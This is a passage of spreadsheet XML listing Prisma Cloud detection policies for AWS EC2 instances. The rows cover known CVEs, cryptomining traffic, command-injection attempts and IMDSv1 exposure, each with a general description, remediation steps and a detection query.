      <c r="U1774" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1774" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1774" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Denial of Service (DoS) with exploits in the wild [WordPress, CVE-2018-6389].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of WordPress software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the WordPress [CVE-2018-6389] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X177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CVE-2021-34473
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-34473</t>
        </is>
      </c>
      <c r="Y1774" t="inlineStr"/>
      <c r="Z1774" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2018-6389 - WordPress &lt;= 4.9.2 DoS via load-scripts or load-styles) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2018-6389'))</t>
        </is>
      </c>
      <c r="AA1774" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1774" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:37</t>
        </is>
      </c>
      <c r="AC1774" t="inlineStr"/>
      <c r="AD1774" t="b">
        <v>1</v>
      </c>
      <c r="AE1774" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1774" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>04bfa022-0b96-4a65-b6a4-38b2d3eb0dfb</t>
        </is>
      </c>
      <c r="AI1774" t="inlineStr">
        <is>
          <t>8bc82c95-4783-4d68-9d3c-781478cd7844</t>
        </is>
      </c>
      <c r="AJ1774" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1774" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" t="inlineStr"/>
      <c r="B1775" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1775" s="2" t="inlineStr"/>
      <c r="D1775" t="inlineStr"/>
      <c r="E1775" t="inlineStr"/>
      <c r="F1775" t="inlineStr"/>
      <c r="G1775" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1775" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1775" t="inlineStr">
        <is>
          <t>Potentially unauthorized cryptomining activity detected on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1775" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1775" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1775" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1775" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1775" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1775" t="inlineStr"/>
      <c r="R1775" t="inlineStr"/>
      <c r="S1775" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1775" t="b">
        <v>0</v>
      </c>
      <c r="U1775" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1775" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1775" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and are connected to remote systems known for cryptominer activities.
Cryptominers surreptitiously use a machine's resources to mine cryptocurrencies. Attackers can exploit vulnerabilities on the affected EC2 instance to compromise their confidentiality, integrity, and availability, allowing them to perform malicious actions. If network connectivity with remote systems known for cryptominer activity is observed on a publicly exposed and exploitable EC2 Instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate cryptominer activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 Instance as soon as possible.</t>
        </is>
      </c>
      <c r="X177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75" t="inlineStr"/>
      <c r="Z1775" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('Traffic from a suspicious IP address associated with Cryptominer activity' or 'Traffic to a suspicious IP address associated with Cryptominer activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1775" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1775" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1775" t="inlineStr"/>
      <c r="AD1775" t="b">
        <v>1</v>
      </c>
      <c r="AE1775" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1775" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>ee0d400a-004f-41e9-8fdf-fd1c78cc5b07</t>
        </is>
      </c>
      <c r="AI1775" t="inlineStr">
        <is>
          <t>87af4446-c32a-48f6-b1e4-e7ac4de0420d</t>
        </is>
      </c>
      <c r="AJ1775" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1775" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1776">
      <c r="A1776" t="inlineStr"/>
      <c r="B1776" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1776" s="2" t="inlineStr"/>
      <c r="D1776" t="inlineStr"/>
      <c r="E1776" t="inlineStr"/>
      <c r="F1776" t="inlineStr"/>
      <c r="G1776" t="b">
        <v>1</v>
      </c>
      <c r="H17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76" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1776" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1776" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Code/Command injection payload detected on traffic targetting a vulnerable AWS EC2 instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1776" t="inlineStr">
        <is>
          <t>WEB_ATTACK,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1776" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1776" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1776" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1776" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1776" t="inlineStr"/>
      <c r="R1776" t="inlineStr"/>
      <c r="S1776" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1776" t="b">
        <v>0</v>
      </c>
      <c r="U1776" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1776" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1776" t="inlineStr">
        <is>
          <t>This policy identifies vulnerable AWS EC2 instance with Code/command injection payload detected in the traffic and having permissions that could potentially lead to privilege escalation.
Code and command injection attacks exploit vulnerabilities in applications to inject and execute malicious code or commands. With elevated EC2 permissions and a successful code/command injection, attackers can steal data, compromise other systems, hijack resources, disrupt services, and establish persistent access within the AWS environment.
This policy checks for the following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the EC2 traffic, add the WAAS rule to prevent this activity, remediate critical and high vulnerabilities, and remove unwanted permissions assigned to the EC2 instance.</t>
        </is>
      </c>
      <c r="X1776"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1776" t="inlineStr"/>
      <c r="Z1776" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) and finding.name = ('AWS EC2 instance with privilege escalation risk permissions' and ('Command Injection payload detected in HTTP traffic' or 'Code Injection payload detected in HTTP traffic')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1776" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1776" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:56</t>
        </is>
      </c>
      <c r="AC1776" t="inlineStr"/>
      <c r="AD1776" t="b">
        <v>1</v>
      </c>
      <c r="AE1776" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1776" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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76" t="inlineStr">
        <is>
          <t>ff0a612a-07c2-4ffa-b286-3f87b81fa82f</t>
        </is>
      </c>
      <c r="AI1776" t="inlineStr">
        <is>
          <t>093288b2-d644-420d-88e2-e55cda88d024</t>
        </is>
      </c>
      <c r="AJ1776" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1776" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" t="inlineStr"/>
      <c r="B1777" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1777" s="2" t="inlineStr"/>
      <c r="D1777" t="inlineStr"/>
      <c r="E1777" t="inlineStr"/>
      <c r="F1777" t="inlineStr"/>
      <c r="G1777" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1777" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1777" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Nginx PHP-FPM, CVE-2019-11043]</t>
        </is>
      </c>
      <c r="L1777" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1777" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1777" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1777" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1777" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1777" t="inlineStr"/>
      <c r="R1777" t="inlineStr"/>
      <c r="S1777" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1777" t="b">
        <v>0</v>
      </c>
      <c r="U1777" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1777" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1777" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Nginx PHP-FPM, CVE-2019-11043]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Nginx PHP-FPM software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Nginx PHP-FPM [CVE-2019-11043] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X177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CVE-2019-11043
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2019-11043</t>
        </is>
      </c>
      <c r="Y1777" t="inlineStr"/>
      <c r="Z1777" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2019-11043 - Nginx PHP-FPM Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2019-11043'))</t>
        </is>
      </c>
      <c r="AA1777" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1777" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:35</t>
        </is>
      </c>
      <c r="AC1777" t="inlineStr"/>
      <c r="AD1777" t="b">
        <v>1</v>
      </c>
      <c r="AE1777" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1777" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>1166011b-72af-4eef-8158-e0dc005fd5e6</t>
        </is>
      </c>
      <c r="AI1777" t="inlineStr">
        <is>
          <t>c05b3f9f-7b9d-4a48-be9e-d5a9357d2d0d</t>
        </is>
      </c>
      <c r="AJ1777" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1777" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" t="inlineStr"/>
      <c r="B1778" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1778" s="2" t="inlineStr"/>
      <c r="D1778" t="inlineStr"/>
      <c r="E1778" t="inlineStr"/>
      <c r="F1778" t="inlineStr"/>
      <c r="G1778" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1778" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1778" t="inlineStr">
        <is>
          <t>Data exfiltration risk due to a publicly exposed AWS EC2 instance with s3:GetObject and s3:ListBucket permissions and not configured to use Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L1778" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1778" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1778" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1778" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1778" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1778" t="inlineStr"/>
      <c r="R1778" t="inlineStr"/>
      <c r="S1778" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1778" t="b">
        <v>0</v>
      </c>
      <c r="U1778" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1778" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1778" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with s3:GetObject and s3:ListBucket permissions and not configured with Instance Metadata Service v2 (IMDSv2)
AWS EC2 instances with s3:GetObject and s3:ListBucket permissions and access to the IMDSv1 instance metadata service endpoint can potentially access sensitive metadata about the instance, including temporary security credentials, that can be used by an attacker to access the S3 buckets associated with the instance and get sensitive data from the S3 bucket.
Immediate attention is required to configure Instance Metadata Service v2 (IMDSv2), and restrict public exposure reported for the EC2 instances. IMDSv2 is a more secure version of the IMDS service provided by AWS that addresses the vulnerabilities present in IMDSv1.</t>
        </is>
      </c>
      <c r="X177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[MISCONFIGURATION]
1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Refer 'Configure instance metadata options for existing instances' section from follwoing URL
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html
NOTE: Make a precaution before you enforce the use of IMDSv2, as applications or agents that use IMDSv1 for instance metadata access will break.</t>
        </is>
      </c>
      <c r="Y1778" t="inlineStr"/>
      <c r="Z1778" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','EC2 with IAM role attached has s3:GetObject and s3:ListBucket permissions','AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)')</t>
        </is>
      </c>
      <c r="AA1778" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1778" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1778" t="inlineStr"/>
      <c r="AD1778" t="b">
        <v>1</v>
      </c>
      <c r="AE1778" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1778" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>090350e4-f20d-403e-8502-e8cd2c0e195b</t>
        </is>
      </c>
      <c r="AI1778" t="inlineStr">
        <is>
          <t>653c7cf9-b815-48ae-8aeb-9f73d2f4415b</t>
        </is>
      </c>
      <c r="AJ1778" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1778" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1779">
      <c r="A1779" t="inlineStr"/>
      <c r="B1779" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1779" s="2" t="inlineStr"/>
      <c r="D1779" t="inlineStr"/>
      <c r="E1779" t="inlineStr"/>
      <c r="F1779" t="inlineStr"/>
      <c r="G1779" t="b">
        <v>1</v>
      </c>
      <c r="H17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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1779" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1779" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable AWS EC2 instance [Linux Kernel, CVE-2022-0847]</t>
        </is>
      </c>
      <c r="L1779" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1779" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1779" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1779" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1779" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1779" t="inlineStr"/>
      <c r="R1779" t="inlineStr"/>
      <c r="S1779" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1779" t="b">
        <v>0</v>
      </c>
      <c r="U1779" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1779" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1779" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-0847].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Linux [CVE-2022-0847] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X177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CVE-2022-0847
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0847</t>
        </is>
      </c>
      <c r="Y1779" t="inlineStr"/>
      <c r="Z1779" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-0847'))</t>
        </is>
      </c>
      <c r="AA1779" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1779" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1779" t="inlineStr"/>
      <c r="AD1779" t="b">
        <v>1</v>
      </c>
      <c r="AE1779" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1779" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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79" t="inlineStr">
        <is>
          <t>9166b8f9-789b-4ac3-afa8-a0c36fc7f5ca</t>
        </is>
      </c>
      <c r="AI1779" t="inlineStr">
        <is>
          <t>09f21ba0-700a-4bc4-b0e7-2e7dbd4ed3ba</t>
        </is>
      </c>
      <c r="AJ1779" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1779" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1780">
      <c r="A1780" t="inlineStr"/>
      <c r="B1780" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1780" s="2" t="inlineStr"/>
      <c r="D1780" t="inlineStr"/>
      <c r="E1780" t="inlineStr"/>
      <c r="F1780" t="inlineStr"/>
      <c r="G1780" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1780" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1780" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to malware in AWS EC2 instance with risky iam:PassRole &amp; ec2:RunInstances permissions</t>
        </is>
      </c>
      <c r="L1780" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M1780" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1780" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1780" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1780" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1780" t="inlineStr"/>
      <c r="R1780" t="inlineStr"/>
      <c r="S1780" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1780" t="b">
        <v>0</v>
      </c>
      <c r="U1780" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1780" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1780" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware or grayware and have risky iam:PassRole &amp; ec2:RunInstances permissions.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The risky privilege escalation iam:PassRole &amp; ec2:RunInstances on the instance further help the attackers to escalate their privilege and perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'iam:PassRole', 'ec2:RunInstances'.
Immediate attention is required to remediate the malware or grayware reported for the instances as soon as possible. Review risky permissions, remove unwanted permissions assigned to the EC2 instances, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X1780" t="inlineStr">
        <is>
          <t>[MALWARE]
Including files flagged as malware in a host filesystem poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from hosts.
[PERMISSION]
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80" t="inlineStr"/>
      <c r="Z1780" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS IAM policy allows Privilege escalation via PassRole &amp; EC2 permissions') and ('Host contains Malware' or 'Host contains Grayware'))</t>
        </is>
      </c>
      <c r="AA1780" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1780" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1780" t="inlineStr"/>
      <c r="AD1780" t="b">
        <v>1</v>
      </c>
      <c r="AE1780" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1780" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>f4fcdff7-a51e-4d8d-ae9d-e429af2dbc48</t>
        </is>
      </c>
      <c r="AI1780" t="inlineStr">
        <is>
          <t>ebcc0dca-984d-431c-8ec2-4f6534c6446c</t>
        </is>
      </c>
      <c r="AJ1780" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1780" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" t="inlineStr"/>
      <c r="B1781" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1781" s="2" t="inlineStr"/>
      <c r="D1781" t="inlineStr"/>
      <c r="E1781" t="inlineStr"/>
      <c r="F1781" t="inlineStr"/>
      <c r="G1781" t="b">
        <v>1</v>
      </c>
      <c r="H17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81" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1781" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1781" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed AWS EC2 instance with PHP CGI Argument Injection vulnerability (PHP, CVE-2024-4577)</t>
        </is>
      </c>
      <c r="L1781" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1781" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1781" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1781" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1781" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1781" t="inlineStr"/>
      <c r="R1781" t="inlineStr"/>
      <c r="S1781" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1781" t="b">
        <v>0</v>
      </c>
      <c r="U1781" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1781" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1781" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known exploitable Remote Code Execution vulnerability affecting PHP CGI  (CVE-2024-4577).
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability affecting the PHP CGI component of PHP installed on Windows Operating Systems. The PHP CGI module on Windows, when used with Apache, has a flaw where certain characters in command lines can be misunderstood as PHP commands. This happens because Windows may change characters using "Best-Fit" behavior with specific code pages. 
Attackers can exploit this vulnerability by crafting requests with specially designed characters, enabling them to inject options into the PHP binary's execution. This can result in running unauthorized PHP code, exposing sensitive data, and performing other malicious actions on the server. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the PHP (CVE-2024-4577) vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1781" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict Internet exposure of reported EC2 instances based on your business requirements by modifying Network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ports (http/80, https/443) such that the CIDR range 0.0.0.0/0 does not exist
8. Click 'Save rules' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-4577
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-4577</t>
        </is>
      </c>
      <c r="Y1781" t="inlineStr"/>
      <c r="Z1781" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2024-4577'))</t>
        </is>
      </c>
      <c r="AA1781" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1781" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:22</t>
        </is>
      </c>
      <c r="AC1781" t="inlineStr"/>
      <c r="AD1781" t="b">
        <v>1</v>
      </c>
      <c r="AE1781" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1781" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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81" t="inlineStr">
        <is>
          <t>736ac7b6-153f-427b-a7b3-8ce6483529fa</t>
        </is>
      </c>
      <c r="AI1781" t="inlineStr">
        <is>
          <t>4cec7c1e-2781-4820-bf7d-05c3e8a2f533</t>
        </is>
      </c>
      <c r="AJ1781" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1781" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1782">
      <c r="A1782" t="inlineStr"/>
      <c r="B1782" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1782" s="2" t="inlineStr"/>
      <c r="D1782" t="n">
        <v>4</v>
      </c>
      <c r="E1782" t="n">
        <v>0</v>
      </c>
      <c r="F1782" t="n">
        <v>0</v>
      </c>
      <c r="G1782" t="b">
        <v>1</v>
      </c>
      <c r="H17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82" t="inlineStr">
